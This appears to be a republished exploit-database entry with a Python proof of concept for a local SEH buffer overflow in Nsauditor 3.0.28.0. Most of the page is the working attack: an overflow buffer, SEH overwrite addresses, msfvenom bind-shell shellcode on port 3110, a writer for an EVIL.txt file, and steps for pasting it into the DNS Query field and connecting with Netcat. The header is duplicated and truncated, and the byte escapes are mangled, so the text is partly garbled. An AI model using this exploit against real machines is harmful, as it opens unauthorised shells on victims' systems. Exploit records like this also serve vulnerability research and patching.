Nsauditor 3.0.28.0 Buffer Overflow

Details: Written by: khalil shreateh; Category: Vulnerabilities; Hits: 245

# Exploit Title: Nsauditor Local SEH Buffer Overflow
# Date: 15-12-2018
# Vendor Homepage:http://www.nsauditor.com
# Software Link: http://www.nsauditor.com/downloads/nsauditor_setup.e # Exploit Title: Nsauditor Local SEH Buffer Overflow
# Date: 15-12-2018
# Vendor Homepage:http://www.nsauditor.com
# Software Link: http://www.nsauditor.com/downloads/nsauditor_setup.exe
# Exploit Author: Achilles
# Tested Version: 3.0.28.0
# Tested on: Windows XP SP3

# 1.- Run python code : Nsauditor.py
# 2.- Open EVIL.txt and copy content to clipboard
# 3.- Open Nsauditor
# 4.- In the Window select 'Tools' > 'Dns Lookup'
# 5.- Paste the content of EVIL.txt into the Field: 'Dns Query'
# 6.- Click 'Resolve'
# 7.- Connect with Netcat on port 3110

#!/usr/bin/python

buffer = "x41" * 5235
NSEH = "xebx06x90x90" #jmp short 6
SEH = "x30xFFxE6x01" #nsnetutils.dll
nops = "x90" * 20

#badchar x00x0ax0dx2e
#msfvenom Bind port 3110
buf = ""
buf += "xd9xc7xb8x8exe7x77xf1xd9x74x24xf4x5bx29"
buf += "xc9xb1x53x83xebxfcx31x43x13x03xcdxf4x95"
buf += "x04x2dx12xdbxe7xcdxe3xbcx6ex28xd2xfcx15"
buf += "x39x45xcdx5ex6fx6axa6x33x9bxf9xcax9bxac"
buf += "x4ax60xfax83x4bxd9x3ex82xcfx20x13x64xf1"
buf += "xeax66x65x36x16x8ax37xefx5cx39xa7x84x29"
buf += "x82x4cxd6xbcx82xb1xafxbfxa3x64xbbx99x63"
buf += "x87x68x92x2dx9fx6dx9fxe4x14x45x6bxf7xfc"
buf += "x97x94x54xc1x17x67xa4x06x9fx98xd3x7exe3"
buf += "x25xe4x45x99xf1x61x5dx39x71xd1xb9xbbx56"
buf += "x84x4axb7x13xc2x14xd4xa2x07x2fxe0x2fxa6"
buf += "xffx60x6bx8dxdbx29x2fxacx7ax94x9exd1x9c"
buf += "x77x7ex74xd7x9ax6bx05xbaxf2x58x24x44x03"
buf += "xf7x3fx37x31x58x94xdfx79x11x32x18x7dx08"
buf += "x82xb6x80xb3xf3x9fx46xe7xa3xb7x6fx88x2f"
buf += "x47x8fx5dxc5x4fx36x0exf8xb2x88xfexbcx1c"
buf += "x61x15x33x43x91x16x99xecx3axebx22x1ex9d"
buf += "x62xc4x74xf1x22x5exe0x33x11x57x97x4cx73"
buf += "xcfx3fx04x95xc8x40x95xb3x7exd6x1exd0xba"
buf += "xc7x20xfdxeax90xb7x8bx7axd3x26x8bx56x83"
buf += "xcbx1ex3dx53x85x02xeax04xc2xf5xe3xc0xfe"
buf += "xacx5dxf6x02x28xa5xb2xd8x89x28x3bxacxb6"
buf += "x0ex2bx68x36x0bx1fx24x61xc5xc9x82xdbxa7"
buf += "xa3x5cxb7x61x23x18xfbxb1x35x25xd6x47xd9"
buf += "x94x8fx11xe6x19x58x96x9fx47xf8x59x4axcc"
buf += "x08x10xd6x65x81xfdx83x37xccxfdx7ex7bxe9"
buf += "x7dx8ax04x0ex9dxffx01x4ax19xecx7bxc3xcc"
buf += "x12x2fxe4xc4"

payload = buffer + NSEH + SEH + nops + buf
try:
f=open("EVIL.txt","w")
print "[+] Creating %s bytes evil payload.." %len(payload)
f.write(payload)
f.close()
print "[+] File created!"
except:
print "File cannot be created"